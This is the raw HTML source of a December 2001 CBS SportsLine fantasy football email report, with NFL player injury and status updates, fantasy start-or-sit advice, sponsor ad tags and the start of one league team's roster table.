&lt;/HEAD&gt;&lt;BODY TEXT="#00000" ALINK="#ffff00" LINK="#0000ff" VLINK="#0000ff" BGCOLOR=#000099&gt;&lt;CENTER&gt;&lt;TABLE BORDER=0 WIDTH=716 CELLPADDING=0 CELLSPACING=0&gt;&lt;TR&gt;&lt;TD&gt;&lt;A HREF=http://www.sportsline.com/links/6/1/163/sffer1225th.cgi&gt;&lt;IMG BORDER=0 SRC=http://images.commissioner.com/images/splash/football/SPLN_mgmt_ereport_header.gif&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;&lt;TABLE WIDTH=100% CELLPADDING=10 CELLSPACING=0 BORDER=0 BGCOLOR="#ffffff"&gt;&lt;TR&gt;&lt;TD&gt;&lt;br&gt;Attention Fantasy Players! Cant find that perfect gift? Let MVP.com make it easy for you! Save 10% on your next purchase when you purchase a Gift Certificate from now until 12/27/01. &lt;a href=http://www.sportsline.com/links/6/1/217/sffer1218e.cgi&gt;Click Here for Details&lt;/a&gt;.  &lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
_x000D_
	&lt;table width="100%" border=0 cellpadding=3 cellspacing=0&gt;_x000D_
	&lt;TR&gt;&lt;TD bgcolor=black&gt;&lt;FONT FACE="verdana,arial,helvetica" size=1_x000D_
color=white&gt;&lt;B&gt;Brought to you by&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
	&lt;/TABLE&gt;_x000D_
	&lt;TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0"&gt;_x000D_
&lt;TR&gt;_x000D_
&lt;TD colspan=2&gt;_x000D_
&lt;IMG SRC="http://images.commissioner.com/images/ads/ereports/sponsorbar15.gif" USEMAP="#menu.map" width="417" height="25" border="0" ALT="Sponsorship Bar"&gt;&lt;/TD&gt;_x000D_
&lt;/TR&gt;_x000D_
&lt;MAP NAME="menu.map"&gt;_x000D_
&lt;AREA shape="rect" coords="0, 1, 83, 25"_x000D_
href="http://www.sportsline.com/links/6/1/217/sffer1218e.cgi"&gt;_x000D_
_x000D_
&lt;AREA shape="rect" coords="83, 1, 166, 25"_x000D_
href="http://www.sportsline.com/links/6/1/226/sffer1218c.cgi"&gt;_x000D_
 _x000D_
&lt;AREA shape="rect" coords="166, 1, 249, 25"_x000D_
href="http://www.sportsline.com/links/6/1/223/sffer1218v.cgi"&gt;_x000D_
 _x000D_
&lt;AREA shape="rect" coords="249, 1, 332, 25"_x000D_
href="http://www.sportsline.com/links/6/1/163/sffer1218t.cgi"&gt;_x000D_
_x000D_
&lt;AREA shape="rect" coords="332, 1, 415, 25"_x000D_
href="http://www.sportsline.com/links/6/5/3/sffer1218ftl.cgi"&gt;_x000D_
 _x000D_
&lt;/MAP&gt;_x000D_
_x000D_
&lt;/TABLE&gt;_x000D_
&lt;BR&gt;_x000D_
You are receiving these e-reports because you have signed up for_x000D_
    CBS SportsLine.com Fantasy Football.  To customize, reschedule,_x000D_
    or turn off these reports please _x000D_
    &lt;A HREF=http://football292.fantasy.sportsline.com/mp/options-ereports?league=ee&amp;owner=96876.9&gt;click here&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;NFL Reports,&amp;nbsp;Player Updates&amp;nbsp;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;!-- Pizzahut Presenting Logo Spotlight tag - Do not remove until 12-31-01 --&gt;_x000D_
&lt;SCRIPT language="JavaScript"&gt;_x000D_
if (!random) {if (parent.random) {var random = parent.random} else {var abc = Math.random() + ""; var random = abc.substring(2,abc.length);}}_x000D_
document.write('&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=o;ord='+random+'?" WIDTH=1 HEIGHT=1 BORDER=0&gt;');_x000D_
&lt;/SCRIPT&gt;_x000D_
&lt;NOSCRIPT&gt;_x000D_
&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=1?" WIDTH=1 HEIGHT=1 BORDER=0&gt;_x000D_
&lt;/NOSCRIPT&gt;_x000D_
&lt;!-- end Pizzahut Logo Spotlight tag --&gt;_x000D_
&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=4&gt;Latest NFL Player News&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1152&amp;"&gt;&lt;B&gt;Jerome Bettis&lt;/B&gt;&lt;/A&gt;, RB PIT - The Rocks &lt;FONT SIZE=1&gt;Updated 12/25/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Bettis is listed as questionable for Week 16. However, he may be able to return to the Steelers' starting lineup. Bill Cowher said Bettis is progressing, and he will be used this week if healthy. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1871&amp;"&gt;&lt;B&gt;Todd Bouman&lt;/B&gt;&lt;/A&gt;, QB MIN - Free Agent &lt;FONT SIZE=1&gt;Updated 12/23/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Bouman is now listed as probable for Sunday's game. He should be able to start against the Jaguars, but he may play with some pain in his thumb. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1264&amp;"&gt;&lt;B&gt;Jeff Graham&lt;/B&gt;&lt;/A&gt;, WR SD - Free Agent &lt;FONT SIZE=1&gt;Updated 12/23/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Graham probably won't play Sunday at Kansas City because of the death of his father in a car accident, coach Mike Riley said Friday. If Graham doesn't play, Trevor Gaylor will start in his place and Nate Turner will be signed off the practice squad. The Chargers are already missing their No. 3 receiver, Tim Dwight, due to complications of a collapsed lung. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1663&amp;"&gt;&lt;B&gt;Antowain Smith&lt;/B&gt;&lt;/A&gt;, RB NE - Pink Panthers &lt;FONT SIZE=1&gt;Updated 12/23/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
Smith rushed for a career-high 156 yards and a touchdown Saturday. He has been one of the best runners in the AFC and will help carry your team to Fantasy glory.   &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1069&amp;"&gt;&lt;B&gt;Steve McNair&lt;/B&gt;&lt;/A&gt;, QB TEN - McKay &lt;FONT SIZE=1&gt;Updated 12/23/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;McNair played Saturday despite suffering from back spasms all week. He played well, throwing a touchdown pass in the second half. Expect him to be a solid No. 1 QB.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=146325&amp;"&gt;&lt;B&gt;Jeff Garcia&lt;/B&gt;&lt;/A&gt;, QB SF - Fear &lt;FONT SIZE=1&gt;Updated 12/23/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
Garcia, whose practice time was limited all week, played in Saturday's game. He admitted afterwards that he has a cracked rib. He played with extra padding, saying it didn't greatly affect his throws. Garcia might not be at full strength in the remaining weeks but he will still be a solid No. 1 Fantasy QB. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1174&amp;"&gt;&lt;B&gt;Eddie George&lt;/B&gt;&lt;/A&gt;, RB TEN - Fear &lt;FONT SIZE=1&gt;Updated 12/23/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;George played in Saturday's game despite suffering from an ankle injury. He left in the third quarter because of a neck injury but returned to the game.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1612&amp;"&gt;&lt;B&gt;Oronde Gadsden&lt;/B&gt;&lt;/A&gt;, WR MIA - Free Agent &lt;FONT SIZE=1&gt;Updated 12/23/01&lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Gadsden did not play in Saturday's game against the Patriots because of a hamstring injury. Chris Chambers started in his absence.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=12207&amp;"&gt;&lt;B&gt;Fred Beasley&lt;/B&gt;&lt;/A&gt;, RB SF - Free Agent &lt;FONT SIZE=1&gt;Updated 12/23/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Beasley broke his right hand. He will probably be sidelined for the rest of the regular season. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1511&amp;"&gt;&lt;B&gt;Joe Horn&lt;/B&gt;&lt;/A&gt;, WR NO - Free Agent &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Horn is once again performing like an elite Fantasy receiver. He is a must-start player during the final weeks of the NFL season. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=188183&amp;"&gt;&lt;B&gt;Maurice Smith&lt;/B&gt;&lt;/A&gt;, RB ATL - Free Agent &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;A banged-up Smith hasn't done much statistically in recent weeks. Don't depend on him during the Fantasy playoffs. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=12431&amp;"&gt;&lt;B&gt;Donald Hayes&lt;/B&gt;&lt;/A&gt;, WR CAR - Free Agent &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Hayes may step back into the forefront this week as the No. 1 wideout in place of Muhsin Muhammad. He isn't very explosive, however, and won't help Fantasy teams much during Weeks 15 through 17.  &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=235174&amp;"&gt;&lt;B&gt;Chris Weinke&lt;/B&gt;&lt;/A&gt;, QB CAR - Free Agent &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Consider Weinke as a backup during the Fantasy playoffs. He lacks the weapons to post better-than-average numbers, but he is a good option if you need an emergency QB. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=12797&amp;"&gt;&lt;B&gt;Kurt Warner&lt;/B&gt;&lt;/A&gt;, QB STL - Hardtail Amigos &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Warner should guide many Fantasy teams to success during the playoffs. Expect fine numbers from him the rest of the way.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1034&amp;"&gt;&lt;B&gt;Rich Gannon&lt;/B&gt;_x000D_
&lt;/A&gt;, QB OAK - Pink Panthers &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Gannon has been a top-flight Fantasy QB this year. He will be a key player on many title teams, and should never be benched. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=12576&amp;"&gt;&lt;B&gt;Randy Moss&lt;/B&gt;&lt;/A&gt;, WR MIN - Metz &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Moss started off slow this season but has once again been one of the best wideouts. Don't hesitate to start him during your playoff run.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=235122&amp;"&gt;&lt;B&gt;Marvin Minnis&lt;/B&gt;&lt;/A&gt;, WR KC - Free Agent &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
Minnis hasn't done much to help Fantasy owners this year. Don't use him during the remaining weeks of the NFL season. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1310&amp;"&gt;&lt;B&gt;Michael Westbrook&lt;/B&gt;&lt;/A&gt;, WR WAS - McKay &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Westbrook has been inconsistent this season as a Fantasy player. He will be a good No. 2 at best during your playoffs.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=235213&amp;"&gt;&lt;B&gt;Rod Gardner&lt;/B&gt;&lt;/A&gt;, WR WAS - Free Agent &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Gardner has been very inconsistent this season. Unless you play in a deeper league, starting Gardner isn't advisable.  &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1471&amp;"&gt;&lt;B&gt;Tony Richardson&lt;/B&gt;&lt;/A&gt;, RB KC - FJS &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Richardson hasn't been a consistent scoring threat this year. Don't use him during the Fantasy playoffs. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=12400&amp;"&gt;&lt;B&gt;Tony Gonzalez&lt;/B&gt;&lt;/A&gt;, TE KC - Free Agent &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Gonzalez hasn't played as well as expected this year. Still, he is too talented to bench during the Fantasy playoffs. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1028&amp;"&gt;&lt;B&gt;Brett Favre&lt;/B&gt;&lt;/A&gt;, QB GB - The Rocks &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Favre has been one of the best QBs this season. Count on him to help lead your team to Fantasy glory.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1599&amp;"&gt;&lt;B&gt;Trent Green&lt;/B&gt;&lt;/A&gt;, QB KC - Free Agent &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Green has been an inconsistent Fantasy QB this year. He is a risky start during the rest of the season. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1593&amp;"&gt;&lt;B&gt;Bill Schroeder&lt;/B&gt;&lt;/A&gt;, WR GB - The Rocks &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Schroeder has had a solid season. Look for him to be a reliable No. 2 wideout during your postseason.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=12429&amp;"&gt;&lt;B&gt;Matt Hasselbeck&lt;/B&gt;&lt;/A&gt;, QB SEA - Free Agent &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Hasselbeck has been a big disappointment this year. Don't use him during the Fantasy postseason. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1223&amp;"&gt;&lt;B&gt;Johnnie Morton&lt;/B&gt;&lt;/A&gt;, WR DET - TayDang &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Morton has been inconsistent this season but he will still be a solid No. 2 during the Fantasy playoffs. Keep him in your lineup.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=235256&amp;"&gt;&lt;B&gt;Reggie Wayne&lt;/B&gt;&lt;/A&gt;, WR IND - Free Agent &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;_x000D_
&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Wayne is healthy again, and showing signs of improvement. But he is not accomplishing enough statistically to help most Fantasy teams. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1262&amp;"&gt;&lt;B&gt;Amani Toomer&lt;/B&gt;&lt;/A&gt;, WR NYG - Hardtail Amigos &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Toomer is having a bit of a down year, but his potential to post solid Fantasy numbers makes him worth considering. He should be a solid No. 2 wideout during your playoffs.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1231&amp;"&gt;&lt;B&gt;Marvin Harrison&lt;/B&gt;&lt;/A&gt;, WR IND - Metz &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
Harrison will be an important Fantasy player during the final weeks of the NFL season. He will have some good outings, even though the Colts are not in the playoff race. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1757&amp;"&gt;&lt;B&gt;Duce Staley&lt;/B&gt;&lt;/A&gt;, RB PHI - TayDang &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Staley started to play well late in the season. Be sure to keep him into your starting lineup. He will be an adequate back for the playoffs.  &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=pro-player-updates&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;start=36&amp;"&gt;More Updates&lt;/A&gt;&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;Teams,&amp;nbsp;Rosters&amp;nbsp;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;_x000D_
&lt;!-- Pizzahut Presenting Logo Spotlight tag - Do not remove until 12-31-01 --&gt;_x000D_
&lt;SCRIPT language="JavaScript"&gt;_x000D_
if (!random) {if (parent.random) {var random = parent.random} else {var abc = Math.random() + ""; var random = abc.substring(2,abc.length);}}_x000D_
document.write('&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=o;ord='+random+'?" WIDTH=1 HEIGHT=1 BORDER=0&gt;');_x000D_
&lt;/SCRIPT&gt;_x000D_
&lt;NOSCRIPT&gt;_x000D_
&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=1?" WIDTH=1 HEIGHT=1 BORDER=0&gt;_x000D_
&lt;/NOSCRIPT&gt;_x000D_
&lt;!-- end Pizzahut Logo Spotlight tag --&gt;_x000D_
&lt;TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0&gt;&lt;TR&gt;&lt;TD&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=options-logo&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;"&gt;&lt;IMG BORDER=0 SRC=/var/images/teams/ee/13-1.gif&gt;&lt;/A&gt;&lt;/TD&gt;&lt;TD VALIGN=top&gt;&lt;IMG SRC="http://images.commissioner.com/images/dot_clear.gif" WIDTH=10 HEIGHT=1&gt;&lt;/TD&gt;&lt;TD&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=5&gt;Grigsby&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=owners&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;owner_name=Mike%20Grigsby&amp;"&gt;Mike Grigsby&lt;/A&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;TABLE  BGCOLOR="#f0f0f0" WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=1&gt;&lt;TR BGCOLOR="#e0e6df"&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Player&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;TM&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;_x000D_
&lt;FONT FACE="Arial, Helvetica"&gt;Pos&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Status&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Next&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Bye&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=12531&amp;team=13&amp;"&gt;Manning, Peyton&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;IND&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;QB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Active&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;@STL&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 4&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1149&amp;team=13&amp;"&gt;Garner, Charlie&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;OAK&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Active&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;@DEN&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 6&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
